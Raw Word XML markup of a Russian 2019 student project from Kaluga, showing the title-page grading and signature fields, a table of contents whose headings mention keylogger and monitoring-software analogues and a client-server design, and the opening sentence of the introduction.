                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> баллов </w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="147"/>
                <w:tab w:val="left" w:pos="1848"/>
              </w:tabs>
              <w:ind w:firstLine="0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 w:rsidRPr="005F1CAF"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ab/>
              <w:t>30-50</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF"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ab/>
              <w:t>(дата)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:snapToGrid w:val="0"/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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Оценка работы</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:snapToGrid w:val="0"/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</w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:snapToGrid w:val="0"/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6240" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="714"/>
                <w:tab w:val="left" w:pos="4250"/>
              </w:tabs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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> баллов </w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1698"/>
              </w:tabs>
              <w:ind w:firstLine="0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 w:rsidRPr="005F1CAF"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ab/>
              <w:t>(оценка по пятибалльной шкале)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4254" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1422"/>
              </w:tabs>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Комиссия:</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4826" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2268"/>
                <w:tab w:val="left" w:pos="2548"/>
                <w:tab w:val="left" w:pos="4537"/>
              </w:tabs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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Жарова О.Ю.</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF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  <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="850"/>
                <w:tab w:val="left" w:pos="3402"/>
              </w:tabs>
              <w:ind w:firstLine="0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 w:rsidRPr="005F1CAF"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ab/>
              <w:t>(подпись)</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF"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ab/>
              <w:t>(ФИО)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2268"/>
                <w:tab w:val="left" w:pos="2569"/>
                <w:tab w:val="left" w:pos="4536"/>
              </w:tabs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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A260A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Лачихина</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A260A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> А.Б</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF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  <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="850"/>
                <w:tab w:val="left" w:pos="3402"/>
              </w:tabs>
              <w:ind w:firstLine="0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 w:rsidRPr="005F1CAF"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ab/>
              <w:t>(подпись)</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>(ФИО)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF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5F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Калуга, 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564871" w:rsidRDefault="00564871" w:rsidP="009A02F0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:id w:val="-1532184293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:rsidR="007359A0" w:rsidRPr="002812CE" w:rsidRDefault="007359A0" w:rsidP="00C51F69">
          <w:pPr>
            <w:pStyle w:val="ab"/>
          </w:pPr>
          <w:r w:rsidRPr="002812CE">
            <w:t>Оглавление</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00BB6AF7" w:rsidRDefault="007359A0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r w:rsidRPr="00E82B6E">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00E82B6E">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00E82B6E">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc4724248" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Введение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_Toc4724248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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4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:rsidR="00BB6AF7" w:rsidRDefault="00705D90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24249" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Исследовательская часть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_Toc4724249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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24250" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Постановка задачи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_Toc4724250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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24251" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Поиск методов решения и аналогов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_Toc4724251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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24252" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Award Keylogger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_Toc4724252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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24253" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WebWatcher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_Toc4724253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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24254" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.3</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kickidler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_Toc4724254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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24255" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.4</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Сравнение аналогов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_Toc4724255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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24256" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обоснование разработки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_Toc4724256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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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:rsidR="00BB6AF7" w:rsidRDefault="00705D90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24257" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Конструкторская часть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_Toc4724257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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24258" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Архитектура и методология решения задачи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_Toc4724258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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24259" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разработка клиента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_Toc4724259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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24260" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Программная платформа клиентского приложения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_Toc4724260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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24261" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Реализация клиентского приложения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_Toc4724261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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24262" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разработка сервера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_Toc4724262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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24263" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Программная платформа серверного приложения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_Toc4724263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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24264" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Реализация серверного приложения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_Toc4724264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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24265" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.3</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Реализация </w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GUI</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> серверного приложения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_Toc4724265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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27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:rsidR="00BB6AF7" w:rsidRDefault="00705D90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24266" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Технологическая часть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_Toc4724266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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24267" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Технические требования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_Toc4724267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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29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:rsidR="00BB6AF7" w:rsidRDefault="00705D9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24268" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF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BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Руководство администратора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_Toc4724268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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29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:rsidR="00BB6AF7" w:rsidRDefault="00705D90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24269" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Заключение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_Toc4724269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BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31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:rsidR="00BB6AF7" w:rsidRDefault="00705D90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24270" w:history="1">
            <w:r w:rsidR="00BB6AF7" w:rsidRPr="009C51F5">
              <w:rPr>
                <w:rStyle w:val="ac"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Литература</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc4724270 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidR="00BB6AF7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007359A0" w:rsidRPr="00E82B6E" w:rsidRDefault="007359A0" w:rsidP="00C51F69">
          <w:pPr>
            <w:spacing w:line="300" w:lineRule="auto"/>
            <w:ind w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E82B6E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25014" w:rsidRDefault="00825014">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc436863066"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C075BB" w:rsidRPr="006F3D4C" w:rsidRDefault="00C075BB" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc4724248"/>
      <w:r w:rsidRPr="006F3D4C">
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="00DF7DEC" w:rsidRPr="002B32F4" w:rsidRDefault="00DF7DEC" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="002B32F4">
        <w:t>Операционная система – комплекс взаимосвязанных программ, предназначенных для управления ресурсами компьютера и организации взаимодействия с пользователем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7DEC" w:rsidRPr="002B32F4" w:rsidRDefault="00DF7DEC" w:rsidP="00ED6F1F">
